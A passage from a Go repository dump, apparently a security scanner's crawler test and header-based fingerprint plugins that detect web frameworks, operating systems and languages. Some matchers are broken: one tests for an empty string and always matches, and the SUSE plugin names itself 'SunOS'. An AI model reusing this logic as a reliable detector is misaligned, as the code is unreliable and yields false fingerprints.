strings.ReplaceAll(raw, "%", "%25") 24 | } 25 | -------------------------------------------------------------------------------- /crawler/katana_test.go: -------------------------------------------------------------------------------- 1 | package crawler 2 | 3 | import ( 4 | "github.com/projectdiscovery/katana/pkg/output" 5 | "github.com/yhy0/logging" 6 | "testing" 7 | ) 8 | 9 | /** 10 | @author: yhy 11 | @since: 2023/1/31 12 | @desc: //TODO 13 | **/ 14 | 15 | func TestKatana(t *testing.T) { 16 | logging.Logger = logging.New(false, "", "1", true) 17 | 18 | out := func(result output.Result) { // Callback function to execute for result 19 | // if ValidatePath(result.Request.URL) { 20 | // logging.Logger.Infoln(result.Request.URL) 21 | // } 22 | logging.Logger.Infoln(result.Request.URL) 23 | } 24 | 25 | Katana("https://www.baidu.com", true, true, out) 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/fingprints_test.go: -------------------------------------------------------------------------------- 1 | package fingprints 2 | 3 | import ( 4 | "fmt" 5 | regexp "github.com/wasilibs/go-re2" 6 | "testing" 7 | ) 8 | 9 | /** 10 | @author: yhy 11 | @since: 2023/10/12 12 | @desc: TODO 13 | **/ 14 | 15 | func TestFingprints(t *testing.T) { 16 | headers := make(map[string][]string) 17 | 18 | headers["Generator"] = []string{"AsciiDoc 1.0.0;version:1.0.0"} 19 | headers["Set-Cookie"] = []string{"JSESSIONID="} 20 | headers["X-Powered-By"] = []string{"PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1"} 21 | for _, p := range ProgramingPlugins { 22 | if p.Fingerprint("", headers) { 23 | t.Log(p.Name()) 24 | } 25 | } 26 | 27 | re := regexp.MustCompile(`<\w[^>]*(="/_jcr_content/)[^>]*>`) 28 | if re.FindStringIndex("_jcr_content") != nil { 29 | fmt.Println("-==") 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /fingprints/framework/ApacheJackrabbit.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import ( 4 | regexp "github.com/wasilibs/go-re2" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type ApacheJackrabbitPlugin struct{} 14 | 15 | func (p ApacheJackrabbitPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | re := regexp.MustCompile(`<\w[^>]*(="/_jcr_content/)[^>]*>`) 17 | if re.FindStringIndex(body) != nil { 18 | return true 19 | } 20 | return false 21 | } 22 | 23 | func (p ApacheJackrabbitPlugin) Name() string { 24 | return "Apache Jackrabbit/Adobe CRX repository" 25 | } 26 | -------------------------------------------------------------------------------- /fingprints/framework/CakePHP.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type CakePHPPlugin struct{} 14 | 15 | func (p CakePHPPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | for _, v := range headers { 17 | value := strings.Join(v, "") 18 | if strings.Contains(value, "CAKEPHP=") { 19 | return true 20 | } 21 | } 22 | 23 | return false 24 | } 25 | 26 | func (p CakePHPPlugin) Name() string { 27 | return "CakePHP - PHP Framework" 28 | } 29 | -------------------------------------------------------------------------------- /fingprints/framework/CherryPy.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type CherryPyPlugin struct{} 12 | 13 | func (p CherryPyPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | for _, v := range headers { 15 | value := strings.Join(v, "") 16 | if strings.Contains(value, "CherryPy") { 17 | return true 18 | } 19 | } 20 | return false 21 | } 22 | 23 | func (p CherryPyPlugin) Name() string { 24 | return "CherryPy - Python Framework" 25 | } 26 | -------------------------------------------------------------------------------- /fingprints/framework/CodeIgniter.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type CodeIgniterPlugin struct{} 12 | 13 | func (p CodeIgniterPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | for _, v := range headers { 15 | value := strings.Join(v, "") 16 | if strings.Contains(value, "ci_session=") { 17 | return true 18 | } 19 | } 20 | return false 21 | } 22 | 23 | func (p CodeIgniterPlugin) Name() string { 24 | return "CodeIgniter - PHP Framework" 25 | } 26 | -------------------------------------------------------------------------------- /fingprints/framework/Dancer.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type DancerPlugin struct{} 12 | 13 | func (p DancerPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | for _, v := range headers { 15 | value := strings.Join(v, "") 16 | if strings.Contains(value, "Dancer") || strings.Contains(value, "dancer.session=") { 17 | return true 18 | } 19 | } 20 | return false 21 | } 22 | 23 | func (p DancerPlugin) Name() string { 24 | return "Dancer - Perl Framework" 25 | } 26 | -------------------------------------------------------------------------------- /fingprints/framework/Django.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type DjangoPlugin struct{} 14 | 15 | func (p DjangoPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | for _, v := range headers { 17 | value := strings.Join(v, "") 18 | if strings.Contains(value, "wgiserver/") || strings.Contains(value, "python/") || strings.Contains(value, "csrftoken=") { 19 | return true 20 | } 21 | } 22 | 23 | if strings.Contains(body, "Welcome to Django") { 24 | return true 25 | } 26 | 27 | return false 28 | } 29 | 30 | func (p DjangoPlugin) Name() string { 31 | return "Django - Python Framework" 32 | } 33 | -------------------------------------------------------------------------------- /fingprints/framework/Flask.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type FlaskPlugin struct{} 14 | 15 | func (p FlaskPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | for _, v := range headers { 17 | value := strings.Join(v, "") 18 | if strings.Contains(value, "flask") { 19 | return true 20 | } 21 | } 22 | 23 | return false 24 | } 25 | 26 | func (p FlaskPlugin) Name() string { 27 | return "Flask - Python Framework" 28 | } 29 | -------------------------------------------------------------------------------- /fingprints/framework/FuelPHP.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type FuelPHPPlugin struct{} 12 | 13 | func (p FuelPHPPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | for _, v := range headers { 15 | value := strings.Join(v, "") 16 | if strings.Contains(value, "fuelcid=") { 17 | return true 18 | } 19 | } 20 | 21 | if strings.Contains(body, "Powered by FuelPHP") { 22 | return true 23 | } 24 | 25 | return false 26 | } 27 | 28 | func (p FuelPHPPlugin) Name() string { 29 | return "FuelPHP - PHP Framework" 30 | } 31 | -------------------------------------------------------------------------------- /fingprints/framework/Grails.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type GrailsPlugin struct{} 12 | 13 | func (p GrailsPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | if _, ok := headers["X-Grails"]; ok { 15 | return true 16 | } 17 | 18 | if _, ok := headers["X-Grails-Cached"]; ok { 19 | return true 20 | } 21 | 22 | for _, v := range headers { 23 | value := strings.Join(v, "") 24 | if strings.Contains(value, "grails") { 25 | return true 26 | } 27 | } 28 | return false 29 | } 30 | 31 | func (p GrailsPlugin) Name() string { 32 | return "Grails - Java Framework" 33 | } 34 | -------------------------------------------------------------------------------- /fingprints/framework/Karrigell.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type KarrigellPlugin struct{} 12 | 13 | func (p KarrigellPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | for _, v := range headers { 15 | value := strings.Join(v, "") 16 | if strings.Contains(value, "karrigell") { 17 | return true 18 | } 19 | } 20 | 21 | return false 22 | } 23 | 24 | func (p KarrigellPlugin) Name() string { 25 | return "Karrigell - Python Framework" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/framework/Laravel.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type LaravelPlugin struct{} 12 | 13 | func (p LaravelPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | for _, v := range headers { 15 | value := strings.Join(v, "") 16 | if strings.Contains(value, "laravel_session=") { 17 | return true 18 | } 19 | } 20 | 21 | return false 22 | } 23 | 24 | func (p LaravelPlugin) Name() string { 25 | return "Laravel - PHP Framework" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/framework/Nette.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type NettePlugin struct{} 12 | 13 | func (p NettePlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | for _, v := range headers { 15 | value := strings.Join(v, "") 16 | if strings.Contains(value, "Nette") || strings.Contains(value, "nette-browser=") { 17 | return true 18 | } 19 | } 20 | 21 | return false 22 | } 23 | 24 | func (p NettePlugin) Name() string { 25 | return "Nette - PHP Framework" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/framework/Phalcon.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type PhalconPlugin struct{} 12 | 13 | func (p PhalconPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | for _, v := range headers { 15 | value := strings.Join(v, "") 16 | if strings.Contains(value, "phalcon-auth-") || strings.Contains(value, "phalconphp.com") || strings.Contains(value, "phalcon") { 17 | return true 18 | } 19 | } 20 | 21 | return false 22 | } 23 | 24 | func (p PhalconPlugin) Name() string { 25 | return "Phalcon - PHP Framework" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/framework/Play.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type PlayPlugin struct{} 12 | 13 | func (p PlayPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | for _, v := range headers { 15 | value := strings.Join(v, "") 16 | if strings.Contains(value, "play! framework;") { 17 | return true 18 | } 19 | } 20 | 21 | return false 22 | } 23 | 24 | func (p PlayPlugin) Name() string { 25 | return "Play - Java Framework" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/framework/Seagull.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import ( 4 | regexp "github.com/wasilibs/go-re2" 5 | "strings" 6 | ) 7 | 8 | /** 9 | @author yhy 10 | @since 2023/10/13 11 | @desc //TODO 12 | **/ 13 | 14 | type SeagullPlugin struct{} 15 | 16 | func (p SeagullPlugin) Fingerprint(body string, headers map[string][]string) bool { 17 | if strings.Contains(body, "") { 18 | return true 19 | } 20 | 21 | re := regexp.MustCompile(`Powered by Seagull PHP Framework`) 22 | if re.FindStringIndex(body) != nil { 23 | return true 24 | } 25 | 26 | re = regexp.MustCompile(`var SGL_JS_SESSID[\s]*=`) 27 | if re.FindStringIndex(body) != nil { 28 | return true 29 | } 30 | 31 | return false 32 | } 33 | 34 | func (p SeagullPlugin) Name() string { 35 | return "Seagull - PHP Framework" 36 | } 37 | -------------------------------------------------------------------------------- /fingprints/framework/Spring.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type SpringPlugin struct{} 14 | 15 | func (p SpringPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | for _, v := range headers { 17 | value := strings.Join(v, "") 18 | if strings.Contains(value, "org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=") { 19 | return true 20 | } 21 | } 22 | 23 | return false 24 | } 25 | 26 | func (p SpringPlugin) Name() string { 27 | return "Spring Framework - Java Platform" 28 | } 29 | -------------------------------------------------------------------------------- /fingprints/framework/Symfony.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type SymfonyPlugin struct{} 12 | 13 | func (p SymfonyPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | if strings.Contains(body, "\"powered by symfony\"") { 15 | return true 16 | } 17 | 18 | if strings.Contains(body, "Powered by ") { 19 | return true 20 | } 21 | 22 | return false 23 | } 24 | 25 | func (p SymfonyPlugin) Name() string { 26 | return "Symfony - PHP Framework" 27 | } 28 | -------------------------------------------------------------------------------- /fingprints/framework/Web2Py.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type Web2PyPlugin struct{} 14 | 15 | func (p Web2PyPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | for _, v := range headers { 17 | value := strings.Join(v, "") 18 | if strings.Contains(value, "web2py") { 19 | return true 20 | } 21 | } 22 | 23 | if strings.Contains(body, "
") { 24 | return true 25 | } 26 | return false 27 | } 28 | 29 | func (p Web2PyPlugin) Name() string { 30 | return "Web2Py - Python Framework" 31 | } 32 | -------------------------------------------------------------------------------- /fingprints/framework/Yii.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type YiiPlugin struct{} 14 | 15 | func (p YiiPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if strings.Contains(body, "Yii Framework") { 17 | return true 18 | } 19 | 20 | if strings.Contains(body, ">Yii Framework") { 21 | return true 22 | } 23 | 24 | return false 25 | } 26 | 27 | func (p YiiPlugin) Name() string { 28 | return "Yii - PHP Framework" 29 | } 30 | -------------------------------------------------------------------------------- /fingprints/framework/beego.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/11/1 8 | @desc //TODO 9 | **/ 10 | 11 | type BeegoPlugin struct{} 12 | 13 | func (p BeegoPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | if strings.Contains(body, "Powered by beego") { 15 | return true 16 | } else { 17 | if v, ok := headers["Set-Cookie"]; ok { 18 | if strings.Contains(strings.Join(v, ""), "beegosessionID=") { 19 | return true 20 | } 21 | } 22 | } 23 | 24 | return false 25 | } 26 | 27 | func (p BeegoPlugin) Name() string { 28 | return "Beego Web Framework - Go" 29 | } 30 | -------------------------------------------------------------------------------- /fingprints/os/CentOS.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type CentOSPlugin struct{} 14 | 15 | func (p CentOSPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "CentOS") { 18 | return true 19 | } 20 | } 21 | 22 | if v, ok := headers["X-Powered-By"]; ok { 23 | if strings.Contains(strings.Join(v, ""), "CentOS") { 24 | return true 25 | } 26 | } 27 | return false 28 | } 29 | 30 | func (p CentOSPlugin) Name() string { 31 | return "CentOS" 32 | } 33 | -------------------------------------------------------------------------------- /fingprints/os/Darwin.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type DarwinPlugin struct{} 14 | 15 | func (p DarwinPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Darwin") { 18 | return true 19 | } 20 | } 21 | 22 | if v, ok := headers["X-Powered-By"]; ok { 23 | if strings.Contains(strings.Join(v, ""), "Darwin") { 24 | return true 25 | } 26 | } 27 | return false 28 | } 29 | 30 | func (p DarwinPlugin) Name() string { 31 | return "Darwin" 32 | } 33 | -------------------------------------------------------------------------------- /fingprints/os/Debian.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | regexp "github.com/wasilibs/go-re2" 5 | "strings" 6 | ) 7 | 8 | /** 9 | @author yhy 10 | @since 2023/10/13 11 | @desc //TODO 12 | **/ 13 | 14 | type DebianPlugin struct{} 15 | 16 | func (p DebianPlugin) Fingerprint(body string, headers map[string][]string) bool { 17 | if v, ok := headers["Server"]; ok { 18 | if strings.Contains(strings.Join(v, ""), "Debian") { 19 | return true 20 | } 21 | } 22 | 23 | if v, ok := headers["X-Powered-By"]; ok { 24 | re := regexp.MustCompile(`(?:Debian|dotdeb|(sarge|etch|lenny|squeeze|wheezy|jessie))`) 25 | if re.FindStringIndex(strings.Join(v, "")) != nil { 26 | return true 27 | } 28 | } 29 | return false 30 | } 31 | 32 | func (p DebianPlugin) Name() string { 33 | return "Debian" 34 | } 35 | -------------------------------------------------------------------------------- /fingprints/os/Fedora.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type FedoraPlugin struct{} 14 | 15 | func (p FedoraPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Fedora") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p FedoraPlugin) Name() string { 25 | return "Fedora" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/os/FreeBSD.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type FreeBSDPlugin struct{} 14 | 15 | func (p FreeBSDPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "FreeBSD") { 18 | return true 19 | } 20 | } 21 | 22 | return false 23 | } 24 | 25 | func (p FreeBSDPlugin) Name() string { 26 | return "FreeBSD" 27 | } 28 | -------------------------------------------------------------------------------- /fingprints/os/Gentoo.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type GentooPlugin struct{} 14 | 15 | func (p GentooPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["X-Powered-By"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "gentoo") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p GentooPlugin) Name() string { 25 | return "Gentoo" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/os/RedHat.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type RedHatPlugin struct{} 14 | 15 | func (p RedHatPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Red Hat") { 18 | return true 19 | } 20 | } 21 | 22 | if v, ok := headers["X-Powered-By"]; ok { 23 | if strings.Contains(strings.Join(v, ""), "Red Hat") { 24 | return true 25 | } 26 | } 27 | return false 28 | } 29 | 30 | func (p RedHatPlugin) Name() string { 31 | return "RedHat" 32 | } 33 | -------------------------------------------------------------------------------- /fingprints/os/SUSE.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type SUSEPlugin struct{} 14 | 15 | func (p SUSEPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "SUSE") { 18 | return true 19 | } 20 | } 21 | 22 | if v, ok := headers["X-Powered-By"]; ok { 23 | if strings.Contains(strings.Join(v, ""), "SUSE") { 24 | return true 25 | } 26 | } 27 | return false 28 | } 29 | 30 | func (p SUSEPlugin) Name() string { 31 | return "SunOS" 32 | } 33 | -------------------------------------------------------------------------------- /fingprints/os/Scientific.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type ScientificPlugin struct{} 14 | 15 | func (p ScientificPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Scientific Linux") { 18 | return true 19 | } 20 | } 21 | 22 | if v, ok := headers["X-Powered-By"]; ok { 23 | if strings.Contains(strings.Join(v, ""), "Scientific Linux") { 24 | return true 25 | } 26 | } 27 | return false 28 | } 29 | 30 | func (p ScientificPlugin) Name() string { 31 | return "Scientific" 32 | } 33 | -------------------------------------------------------------------------------- /fingprints/os/SunOS.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type SunOSPlugin struct{} 14 | 15 | func (p SunOSPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "SunOS") { 18 | return true 19 | } 20 | } 21 | 22 | if v, ok := headers["X-Powered-By"]; ok { 23 | if strings.Contains(strings.Join(v, ""), "SunOS") { 24 | return true 25 | } 26 | } 27 | return false 28 | } 29 | 30 | func (p SunOSPlugin) Name() string { 31 | return "SunOS" 32 | } 33 | -------------------------------------------------------------------------------- /fingprints/os/UNIX.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type UNIXPlugin struct{} 14 | 15 | func (p UNIXPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "UNIX") { 18 | return true 19 | } 20 | } 21 | 22 | return false 23 | } 24 | 25 | func (p UNIXPlugin) Name() string { 26 | return "UNIX" 27 | } 28 | -------------------------------------------------------------------------------- /fingprints/os/Ubuntu.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type UbuntuPlugin struct{} 14 | 15 | func (p UbuntuPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Ubuntu") { 18 | return true 19 | } 20 | } 21 | 22 | if v, ok := headers["X-Powered-By"]; ok { 23 | if strings.Contains(strings.Join(v, ""), "Ubuntu") { 24 | return true 25 | } 26 | } 27 | return false 28 | } 29 | 30 | func (p UbuntuPlugin) Name() string { 31 | return "Ubuntu" 32 | } 33 | -------------------------------------------------------------------------------- /fingprints/os/WindowsCE.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type WindowsCEPlugin struct{} 14 | 15 | func (p WindowsCEPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "WinCE") { 18 | return true 19 | } 20 | } 21 | 22 | return false 23 | } 24 | 25 | func (p WindowsCEPlugin) Name() string { 26 | return "Windows CE" 27 | } 28 | -------------------------------------------------------------------------------- /fingprints/os/WindowsServer.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type WindowsServerPlugin struct{} 14 | 15 | func (p WindowsServerPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Win32") || strings.Contains(strings.Join(v, ""), "Win64") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p WindowsServerPlugin) Name() string { 25 | return "Windows Server" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/AsciiDoc.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type AsciiDocPlugin struct{} 14 | 15 | func (p AsciiDocPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Generator"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "AsciiDoc ") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p AsciiDocPlugin) Name() string { 25 | return "AsciiDoc" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Asp.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | regexp "github.com/wasilibs/go-re2" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type AspPlugin struct{} 14 | 15 | func (p AspPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | re := regexp.MustCompile(`\.asp(x)?`) 17 | if re.FindStringIndex(body) != nil { 18 | return true 19 | } 20 | 21 | return false 22 | } 23 | 24 | func (p AspPlugin) Name() string { 25 | return "ASP" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Erlang.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type ErlangPlugin struct{} 14 | 15 | func (p ErlangPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Erlang") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p ErlangPlugin) Name() string { 25 | return "Erlang" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Java.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type JavaPlugin struct{} 14 | 15 | func (p JavaPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Set-Cookie"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "JSESSIONID") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p JavaPlugin) Name() string { 25 | return "Java" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Lua.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type LuaPlugin struct{} 14 | 15 | func (p LuaPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["X-Powered-By"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Lua") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p LuaPlugin) Name() string { 25 | return "Lua" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Perl.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | regexp "github.com/wasilibs/go-re2" 5 | "strings" 6 | ) 7 | 8 | /** 9 | @author yhy 10 | @since 2023/10/13 11 | @desc //TODO 12 | **/ 13 | 14 | type PerlPlugin struct{} 15 | 16 | func (p PerlPlugin) Fingerprint(body string, headers map[string][]string) bool { 17 | if v, ok := headers["Server"]; ok { 18 | if strings.Contains(strings.Join(v, ""), "Perl") { 19 | return true 20 | } 21 | } 22 | 23 | re := regexp.MustCompile(`\.pl(?:$|\?)`) 24 | if re.FindStringIndex(body) != nil { 25 | return true 26 | } 27 | 28 | return false 29 | } 30 | 31 | func (p PerlPlugin) Name() string { 32 | return "Perl" 33 | } 34 | -------------------------------------------------------------------------------- /fingprints/programing/Python.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 